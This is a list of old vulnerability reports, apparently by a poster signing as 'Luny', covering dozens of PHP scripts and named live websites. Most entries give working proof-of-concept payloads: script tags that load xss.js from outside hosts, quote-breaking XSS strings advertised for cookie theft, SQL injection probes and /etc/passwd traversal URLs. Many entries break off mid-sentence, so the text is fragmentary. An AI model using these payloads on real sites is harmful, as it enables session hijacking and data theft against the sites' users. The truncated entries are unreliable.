Nwom topsites v3.0
http://www.nwom.net
Vulnerable files:
Comment input.
index.php
SQL info released on error:
http://www.example.com/index.php?o='
XSS:
http://www.example.com/index.php?o=
- Luny
results.php will execute as well.
- Luny
e.com/yald.php?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E
- Luny
OZJournal v1.5
Homepage:
http://ozjournals.awardspace.com/index.php
Affected files:
search input box
index.php
viewing archives
show comment page
XSS vulnerability via search input box:
Data isn't properly sanitized before being displayed. For
Orbitmatrix PHP Script v1.0
Homepage:
http://www.orbitcoders.com/
Affected files:
index.php
Possible SQL injection?:
http://www.example.com/index.php?page_name='
And by trying a XSS vuln as shown below on page_name we see the query below
which is displayed on screen:
http://www.exampl
Photocycle v1.0
Homepage
http://adambrown.info/p/tools/photocycle
XSS vuln on phpage var:
PoC
http://www.example.com/photocycle&phpage=http://www.youfucktard.com/xss.js>
Advanced Guestbook v1.0
Homepage:
http://www.sport-slo.net/
Affected files:
guestbook.php
---
XSS vuln on guestbook.php:
Data isn't sanitized before being submitted to guestbook.txt and displayed
onscreen. The code:
if($_POST['action'])
{
TigerTom Scripts
Homepage:
http://www.ttfreeware.co.uk/
Affected files:
TTCalc script v1.0
---
Data passed in the "Length of loan, years" and "Length of mortgage, years" input
boxes is not sanitized before being generated.
For a PoC in the input boxes listed ab
Shopping Cart V0.9
Homepage:
http://glendown.de/shop/
Affected files:
index.php
editshop.php
edititem.php
-
XSS vuln on editshop.php & edititem.php:
Data isn't sanitized before being entered. For a PoC as a shop name or item
enter in:
alert('
mAds v1.0
Homepage:
http://lowpricescripts.com/product_info.php?products_id=51
Affected files:
*Searching
---
XSS vuln when searching:
Like the hotbot XSS vuln, when searching mAds returns with its results they are
generated dynamically on screen, with
Buddy Zone Version 1.0.1
Homepage:
http://www.vastal.com/buddy-zone-social-networking-script.html
Affected files:
*Sending invitations
*Profiles
*Blogs
*Journals
*Posting comments
*Posting in the forum
*Sending mail
*Creating a group
view_sub_forum.php
view_post.php
view_classified
ezWaiter v3.0
Homepage:
http://www.ezwaiter.com/
Affected files:
Placing an order
login.php
---
XSS vuln when placing an order:
User input is not sanitized before being generated. For a PoC in the two boxes
labeled
"Who is this item for?" and "
PHPClassifieds General v.n/a
Homepage:
http://www.phpclassifieds.info/
Affected files:
search.php
*Posting classified ads
-
SQL injection on search.php via rate var:
http://www.example.com/search.php?rate=[sql]
-
Usenet Script v0.5
Homepage:
http://www.metalhead.ws/usenet
Description:
"Those scripts allow you to mirror a Newsgroup in an SQL database. The
development database was Postgresql, but it uses dbx and should therefore be
able to work with other database systems, too. Furthermore, a fronten
Winged Gallery v1.0
Homepage:
http://winged.info/index.php?p=gallery
XSS vuln on thumb.php:
http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg";>''>">">">http://youfucktard.com/xss.js><"<'<'<'<'&size=75&type=2&w=128&h=128">''>">">">
Somechess v1.5 rc1
Homepage:
http://www.astrodogpress.org/chess/
Affected files:
*Profile input boxes
---
Upon dumping the SQL data into the table, if you get errors and it won't create
the tables & data (like it did to me), then just remove all the " from the SQL
file
cjGuestbook v1.3
Homepage:
http://cmj-php.opanelhosting.com
Affected files:
* posting in the guestbook
XSS vuln with cookie disclosure:
cjGuestbook uses bbcode, and since there's a vulnerability in early editions of
bbcode we can achieve our XSS example.
For a PoC put in as your commen
V3 Chat Instant Messenger
http://www.v3chat.com/
Affected files:
/mail/index.php
/mail/reply.php
is_online.php
online.php
profile.php
profileview.php
search.php
mycontacts.php
expire.php
* Editing your profile:
- input boxes
--
Mail Vuln
MPCS v0.2
Homepage:
http://tpvgames.co.uk/mpcs
Affected files:
comment.php
XSS vuln with cookie & full path disclosure:
Direct HTML injection doesn't seem to work, however, if you navigate to the code
below in your browser, and then post a comment on the same page, our XSS
example will
Dragons Kingdom Script v1.0
Homepage:
http://www.dkscript.com/
Affected files:
*Sending mail:
- Sending in-game mail
*Character Profiles:
- All input boxes of the profile
* Posting & Replying in the forum:
- Posting in the forum
- Replying in the forum
* Form spoofing can occur i
Technorati.com
Homepage:
http://www.technorati.com
Affected files:
login box
Creating a new account input boxes
Login box XSS vuln:
By escaping quotes and using script tags, we can accomplish our XSS example. For
PoC try putting the following code in the login box:
">">">">'>'>'>"><""
43things.com
Homepage:
http://www.43things.com
Affected files:
input box "I want to add to my list"
posting a comment
XSS vuln via input text of the box "I want to"
When you add an item that's already on your list.
For a PoC we have style
Blogspot.com
Homepage:
http://www.blogspot.com
Affected files:
Blog input boxes
--
XSS vuln via Display name input box.
Blogger doesn't properly sanitize user input before generating it. For
example, you can't use illegal characters in your user
Biblenet.net
Homepage:
http://www.biblenet.net
Affected files:
gettinginvolved.html
register.php
member.php
/library/index.html
-
Biblespace uses vBulletin for most of their site, so most of these vulns are
based in the vbulletin site themselves,
B3ta.com
Homepage:
http://www.b3ta.com
Affected files:
Input boxes of your profile
XSS vuln with cookie disclosure via Profile: box.
Data isn't correctly sanitized before being generated. We can bypass the
filters of the site one way by using img tags and converting our javascript to
U
Facetherating.com
Homepage:
http://www.facetherating.com
Affected files:
showprofile.php
XSS vuln via showprofile.php:
The site does the typical filtering of adding backslashes to ' and " so we'll
try something different this time and use a fromCharCode.
http://www.facetherating.com/s
Ratemylook.co.uk
Homepage:
http://www.ratemylook.co.uk
Affected files:
user.php4
top.php4
hot.php4
toponline.php4
user.php4 XSS vuln with cookie disclosure:
http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own";>">">'>http://yo
About.com
Homepage:
http://www.about.com
Affected files:
Search input box
fullsearch.htm
shortform.htm
forum.aspx
profile_center.asp
posting in the forum
---
Search input box xss vuln with cookie disclosure:
Works by putting the tags in the input box,
Ratescene.co.uk
Homepage:
http://www.ratescene.co.uk
Affected files:
input boxes of editing your profile
Profile input boxes XSS vuln with cookie disclosure:
Data isn't sanitized, try entering the code below:
Screenshots:
http://www.
Windowsitpro.com
Homepage:
http://www.windowsitpro.com
Affected files:
Search input box
Downloading whitepapers
Search input box xss vuln with cookie disclosure:
We convert our javascript to hex format so we don't receive the default "Your
request cannot be processed as this time" error
Facerave.com
Homepage:
http://www.facerave.com
Affected files:
* Profile input boxes
- Self Description box
* Posting a blog entry
* Sending a message
index.php
--
XSS vuln with cookie disclosure via posting a comment:
No filte
Hotscripts.com
Homepage:
http://www.hotscripts.com
Affected files:
search input box
adding a review
Editing your profile
sending a author a message.
Creating a new listing
XSS vuln with cookie disclosure in search input box:
For a PoC try p
hi5.com
Homepage:
http://www.hi5.com
Affected files:
Input boxes of editing your profile.
XSS Vuln with cookie disclosure:
It seems hi5.com allows a lot of HTML tags to be used on their site but they
will filter out words like javascript, applet, and iframe tags (which is to be
expected
Cybersocieties.com
Homepage:
http://www.cybersocieties.com
Affected files:
* Input boxes in profile:
- Full name box
- Occupation box
- MSN box
- Yahoo box
- AIM Box
* Viewing a profile
--
XSS vuln via input boxes in profile:
Apnaspace.com (A myspace type site for arab & indian teens)
Homepage:
http://www.http://www.apnaspace.com
Affected files:
* Comment input box:
* Posting a blog entry:
- Entry title
- Entry body
* Viewing a profile
* Posting a bulletin.
* Commenting on a picture
* Sending mail to
Dealgates.com
Homepage:
http://www.dealgates.com
Affected files:
*Input boxes when registering new account
* Search box
-
XSS vuln with cookie disclosure when registering a new account.
To bypass the adding backslashes to ; and ", we use the long U
Housecarers.com
Homepage:
http://housecarers.com
Affected files:
* Posting a Housesit:
- City/Town box
- County/District box
- Suburb box
- City/Town Area box
* Searching for housesitters
* Sending messages to house sitters.
* Viewing member profiles
---
Bingbox.com
Homepage:
http://www.bingbox.com
Affected files:
* Profile input boxes:
- City input
* Registering
* Viewing Birthdays
* Adding a friend
* Viewing people online
---
XSS with cookie disclosure via inviting friends:
http://w
Youtube.com
Homepage:
http://www.youtube.com
Affected files:
* Search box input
* Adding a new blog:
- Blog name
XSS Vuln with cookie disclosure via search box:
Data isn't sanitized when using the search box. For PoC input:
http://www.youfucktard.com/xss.js>
PoC link:
http://
Blacksingles.com
Homepage:
http://www.blacksingles.com
Affected files
Profile input boxes
Add a friend input box.
list.html
view.html
reply.html
compose.html
-
XSS vuln with cookie disclosure via the Location box.
User data isn't sanat
Chatizens.com Also known as Chattown.com
Homepage:
http://www.chatizens.com
Affected files:
* Profile input boxes:
All input boxes of your profile.
* Browsing the forums
XSS vuln with cookie disclosure via profile input boxes.
To bypass c
Boardhost.com
Description:
Free Msgboard hosting service.
Homepage:
http://www.Boardhost.com
Affected files
Input boxes of posting a message
Searching for a listing board
-
XSS vuln with cookie disclosure when posting a msg (Tested on
MP3 Search/Archive v1.2
Homepage:
http://www.bloodys.com
Affected files:
Search input box.
index.php
Data is not properly sanitized before it's generated. For PoC try putting the
code below in the search box:
http://youfucktard.com/xss.js>
Screenshots:
http://www.youfucktard.co
Emllabs.com
Affected files:
articles.php
search input box.
The search input box doesn't properly filter user input. For PoC try putting
in: [SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
XSS Vulnerability:
http://previous.emllabs.com/articles.php?navCur=[SCRIPT%20SRC=http://evils
Yourfacesucks.com
Homepage:
http://www.yourfacesucks.com
Affected files:
music/video input boxes in editing profile
subject box of sending a PM
thread.php
---
XSS Vuln with cookie disclosure in profile input boxes:
No filter evasion needed here. Fo
Meefo.com
Homepage:
http://meefo.com
Affected files:
reading profiles
index.php
input boxes on profiles
sending private msgs
--
Reading a profile and with cookie include PoC:
Since data isn't properly filtered (backslashes are added to ' and "), a user
can
Vampirefreaks.com
Homepage:
http://www.vampirefreaks.com
Affected files:
input boxes of editing your profile
posting a journal entry.
Commenting
XSS Vulnerability:
Data isn't properly filtered when editing your profile. One way to bypass the
filter is to escape quotes and use closing b
Virtualtourist.com
Homepage:
http://www.virtualtourist.com
Affected files:
Input boxes of your profile
search destination input box
---
XSS vulnerability with cookie disclosure:
Under the section of "Tell others a little about yourse
Onlinenode.com
Homepage:
http://www.onlinenode.com
Affected files:
node_category.php
node_article.php
webpage.php
guestbook.php
journal.php
pictures.php
chatroom.php
---
XSS Vuln via node_category.php:
One way to achieve this is to use black tags with an op
Stargazer.org
Homepage:
http://www.stargazer.org
Affected files:
login box
registration boxes
creating a survey
---
Login box & registration XSS Vuln:
for proof of concept just try adding:
'';!--"=&{()}http://youfucktard.com/xss.js>'';!--"=&{()
Cescripts.com Scripts
Below are scripts I tested from the site cescripts.com. This site seems to be
selling canned scripts, full of errors. Anyways, take a look:
Car Classifieds
Homepage:
http://www.cescripts.com/
Affected files:
index.php
XSS Vulnerabilities PoC:
Viewing a car:
htt
Wireclub.com
Homepage:
http://www.wireclub.com
Affected files:
input boxes of editing a profile
XSS Vuln with no filter evasion at all:
We notice that when trying to put a url in the Open line about yourself input
box, we get the msg "no urls allowed" as well as "the field cannot cont
Nowtalking.com
Homepage:
http://www.nowtalking.com
Affected files:
input boxes of logging in and searching
friends-new.asp
gallery.asp
friends.asp
gb.asp
JET DB error due to injection:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'UserNam
Opengaia.com
Homepage:
http://www.opengaia.com
Affected files:
my_page.php
module.php
editing your profile
the search input box
adding a diary/blog
Just like in onlinenode.com's vulnerabilities, it seems this site filters data
just about the same.
Wanderlist.com
Homepage:
http://www.wanderlist.com
search.cgi
Search box input
adding a item to a list
Search.cgi XSS vuln with sessions disclosure:
By putting a few ending opening tags with quotes before and after, we are able
to create a XSS example:
">">">'http://youfucktard.com/xss.js
Myscrapbook
Homepage:
http://www.pixytrix.com/myscrapbook/
Affected files:
singlepage.php
---
Full path error with viewing most files in the txt-db-api dir:
Warning: main(API_HOME_DIRutil.php): failed to open stream: No such file or
directory in /
5 Star Review Script
Homepage:
http://www.review-script.com/
Affected files:
index2.php
report.php
search box
editing your profile
posting a review.
--
index2.php XSS Vuln with cookie disclosure:
By ending quotes and using a few closing and opening tag
Diaryland.com
Homepage:
http://www.diaryland.com
Affected files:
input boxes on creating diary entries.
posting comments in diary entries
XSS Vuln PoC:
With no filter evasion at all, we simply put as our entry:
[SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT]
Screenshots:
http://
Mydeardiary.com
Homepage:
http://www.mydeardiary.com
Affected files:
search input boxes
Adding new diary entries
--
We create our XSS example by ending quotes with tags before and after:
">">">'>http://youfucktard.com/xss.js><"<"<"<"<"
Screensho
Tempinbox.com
Homepage:
http://www.tempinbox.com
Affected files:
checkmail.pl
Description:
Tempinbox.com is a free throw away, no sending email service. You enter an
account name and you can instantly check email.
XSS Vulnerability:
It seems the title of emails and subjects are not s
AsianXO.com
Homepage:
http://www.asianxo.com/
Affected files:
directory.php
profiles.php
Input boxes of editing profile
XSS Vulnerability via dir_id:
Directory.php PoC:
http://www.axo2.com/directory.php?dir_id=1";>http://evilsite.com/xss.js><"
Profiles.
fx-APP Version 0.0.8.1
Homepage:
http://fx-app.org/
Affected files:
search input box
index.cgi
input boxes on your profile
adding a menu item
---
I noticed there was already several BID's on the a script WebAPP:
http://search.secur
Ringlink v3.2
Homepage:
http://www.ringlink.org
Affected files:
next.cgi
stats.cgi
list.cgi
XSS Vulnerability PoC:
http://www.example.com/ringlink/next.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]
http://www.example.com/ringlink/stats.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]
ST AdManager Lite v1
Homepage:
http://www.site-trade.com/index.php
Affected files:
index.php
submit.php input form
XSS Vulnerabilities:
submit.php input forms do not correctly sanitize user input before submitting
it to be checked by an admin and then published. This in turn to allow a u
P.A.I.D v2.2
Homepage:
http://www.webexceluk.net
Affected files:
faq.php
input form of logging in.
index.php
The input forms of logging into My Account do not sanitize user input. For PoC
of a XSS attack simply put in:
"><"
It also seems when logging in, even if your details are incor
TinyMuw v1.0
Homepage:
http://www.l0j1k.com/tinyMuw/index.php
Affected files:
quickchat.php input box
videoPage.php
Input isn't sanitized before being generated in the quickchat.php chatbox. For
PoC try putting:
in as your comment.
Full path disclosure error via URL Injection:
http:
MobeSpace v2.0
Homepage:
http://mobescripts.com/
Affected files:
index.php
The input forms of:
- Profile
- Comments
- Uploading a file to your locker
- Posting in your blog
- Creating a caption for your pic
- Sending PM's
The input boxes of the above do not sanitize user input befo
Ticket Booking Script
Homepage:
http://www.mole.com.ua
Affected files:
input boxes on booking2.php
XSS Vulnerabilities:
The input boxes on booking2.php do not sanitize user input before generating it
and then submitting it to a MySQL db. This can cause XSS examples as well as
possible S
Booking Script.
Homepage:
http://www.mole.com.ua
PError with full path disclosure and possible buffer overflow?:
http://www.example.com/week.php?year=2006&month=06&day=0'
Warning: checkdate() expects parameter 2 to be long, string given in
/home/httpd/vhosts/domain/subdomains/booking/http
phazizGuestbook v2.0
Homepage:
http://www.devhome.de/#english_version
Affected files:
input boxes of name, email, url, text.
XSS Vulnerability:
None of these input boxes sanitize user input before generating it. For PoC put
in any of the above boxes.
iFoto v0.20-06/06/06
Homepage:
http://ifoto.ireans.com/
Affected files:
XSS Vulnerability:
The dir path to show the image is base64 encoded, so to attempt this XSS
example we encode our code in base64.
The code we'll be using is javascript in an iframe tag. [IFRAME
SRC="javascript:aler
OkMall v1.0
Homepage:
http://www.okscripts.com/
Affected files:
search.php
XSS Vulnerabilities:
The search input box doesn't properly filter user input before generating it.
Backslashes are added but we can easily
evade this.
For PoC try putting a [img src=lol.jpg] in the search box.
Ez Ringtone Manager
Homepage:
http://www.scriptsez.net
Affected files:
player.php
search input box.
XSS Vulnerabilities:
http://example.com/ringtones/player.php?action=preview&id=http://evilsite.com/xss.js>&cat=LG%20Mobiles
The search box doesn't properly filter user input. Tags like
E-Dating System
Homepage:
http://www.scriptsez.net/
Affected files:
Input boxes.
cindex.php
Description:
A Professional dating system that uses flatfiles instead of MySQL.
XSS Vulnerabilities PoC:
The input boxes of sending a message, and editing your profile do not
properly filt
Easy Ad-Manager v. (unknown, not listed on homepage)
Homepage:
http://www.scriptsez.net
Affected files:
details.php
XSS Vulnerability with full path disclosure:
http://www.example.com/eam/details.php?do=load&mbid=/http://evilsite.com/xss.js>
Warning: fopen(stats//This is remote text via
Chemical Directory v.unknown (doesn't say on website)
Homepage:
http://www.scriptsez.net/
Affected files:
dictionary.php
XSS Vulnerability via keyword variable:
http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT
SRC=http://evilsite.com/xss.js][/SCRIPT]
vSCAL and vREAL v1.0
Homepage:
http://www.babykatiemedia.com/
Affected files:
index.php
myslideshow.php
XSS Vulnerability via lid variable:
http://www.example.com/vscal/index.php?page=showlisting&lid=
XSS Vulnerability via myslideshow.php
http://www.example.com/vscal/myslideshow.php?d
PBLGuestbook v1.31
Homepage:
http://www.pixelatedbylev.com/
Affected files:
input boxes of the guestbook.
XSS Vulnerabilities PoC:
I noticed that common tags like
GANTTy v1.0.3
Homepage:
http://www.gantty.com
Affected files:
index.php
XSS Vulnerabilities PoC:
XSS Vulnerability:
http://www.example.com/index.php?action=login&message=+email&lang=
Full path disclosure error:
http://www.example.com/index.php?action=authenticate&lang='
Error: FILE
ParticleSoft Wiki v1.0.2
Affected files:
input boxes on editing pages:
XSS Proof of concept:
We notice br tags are allowed, so by using a STYLE attribute using a comment to
break up expression we can create a XSS vuln:
Put the following in when editing a page:
Thanks to Rsnake & Rom
ParticleSoft Whois v1.0.3
Homepage:
http://www.particlesoft.net/particlewhois/
XSS Proof of concept via URL injection:
http://whois.particlesoft.net/index.php?do=runcheck&target=";>http://evilsite.com/scriptlet.html <<"&ext=all
XSS Via input box:
">http://evilsite.com/scriptlet.html <<"
Partial Links v1.2.2
Homepage:
http://www.particlesoft.net/particlelinks/
Affected files:
index.php
page_footer.php
admin.php
Exploits & Vulnerabilities:
Possible directory traversal?:
http://www.example.com/Other_Sites/X_%2526_Y/../../../../../etc/passwd/
SQL Injection:
http://www.
Homepage:
http://www.particlesoft.net/particlegallery/
Affected files:
viewimage.php
viewalbum.php
SQL Injection:
http://www.example.com/viewimage.php?imageid='
XSS Vulnerability proof of concept:
http://www.example.com/viewimage.php?imageid=http://evilsite.com/scriptlet.html>
Possible
Kmita FAQ v1.0
Homepage:
http://www.kmita-faq.com
Affected files:
search.php
index.php
Search.php does not sanitize user input before dynamically generating it.
Proof of concept:
http://www.example.com/search.php?q=http://evilsite.com/xss.js>
SQL Injection proof of concept:
http://www
LabWiki 1.0
Homepage:
http://www.bioinformatics.org/phplabware/labwiki/index.php
Affected files:
search.php
The search input box does not sanitize user input before dynamically generating
it.
XSS Proof of concept:
">http://evilsite.com/xss.js><"
MyTrueHood.com
Homepage:
http://www.mytruehood.com
Affected files:
Input boxes of submitting a comment and signing a guestbook
XSS proof of concept:
put in the signing a guestbook or leaving
a comment in a blog box.
PHP ManualMaker v1.0
Homepage:
http://deltascripts.com/phpmanualmaker/
Affected files:
index.php
Search boxes
Comment boxes
XSS proof of concept:
Input in search or comment box:
">">">'><""><'<"
XSS via URL injection of id:
http://www.example.com/manualmaker/index.php?print=1&id=htt
Weblog Oggi v1.0
Homepage:
http://www.hotwebscripts.com/index.php
User input isn't sanitized before being dynamically generated. For proof of
concept just put in as a comment
/somecommand.php?somevariables=maliciouscode>
--
Luny - http://www.youfucktard.com
QontentOneCMS v1.0
Homepage:
http://www.qontentone.com/
Affected files:
search.php
input forms
XSS Proof of concept:
http://www.example.com/search.php?search_phrase=";>http://www.evilsite.com/xss.js><"&search=Search
Homepage:
http://www.tuttophp.altervista.org/morrisguest-ing.htm
Description:
Morris Guestbook is a text-based guestbook with the following features: Data
storing on text file, paging of messages on screen, words crypting, counting of
inserted messages, blockage of messages with both html t
Homepage:
http://www.tuttophp.altervista.org/smileguest-ing.htm
Description:
Smile Guestbook is a cool text-based guestbook with smilies inserting and other
features below
Affected files:
view.php
An XSS attack is possible due to no filtering of pagina variable:
http://www.example.com/p
Homepage:
http://www.tuttophp.altervista.org/main.php
Description:
Text-based guestbook with the following features: - Data storing on text file -
Paging of messages on screen - Blockage of messages with words too long into -
Blockage of messages with both html tags(<>) - Validity-checking of
MyYearBook.com - Personal community site like myspace.com
Affected files:
Input forms of:
editing profile
posting a blog
search boxes
posting a bulletin
posting a comment
---
XSS Vulnerabilities proof of concept:
When editing your profile, it seems
>
--
Luny - http://www.youfucktard.com
searchbox:
--
Directory Traversal:
http://www.example.com/make_thumbnail.php?imgpath=../../../../etc/passwd/
------
Luny - http://www.youfucktard.com
PHPSimple Choose v0.3
Homepage:
http://phpsimplechoose.sourceforge.net
Description:
Do you need to add some fun to your site? Look no further. With
PHPSimpleChoose you can let your users input terms and have one randomly
chosen. Every bit of text is changeable, and we are working on al
iBoutique.MALL
Homepage: http://www.netartmedia.net/mall/
Description:
Based on iBoutique 4.0, iBoutique.MALL is a powerful multi user mall software
solution. It makes possible for the new vendors to signup and create their own
customized online stores with ease.
Affected files: index.ph
iFlance
Homepage:
http://www.ifusionservices.co.uk/
Description:
iFlance is a powerful freelance script, that allows anyone to run their very
own professional, profitable
Freelancing website
Affected files:
acc_verify.php
project.php
all input boxes
XSS BY URL Injection of acc_v
Pre News Manager v1.0
Homepage:
http://www.preprojects.com/news.asp
Description:
Affected files:
index.php
news_detail.php
email_story.php
thankyou.php
printable_view.php
tella_friend.php
send_comments.php
Exploits & Vulns:
XSS Vulnerabilities:
By inserting alert("XSS")"> onto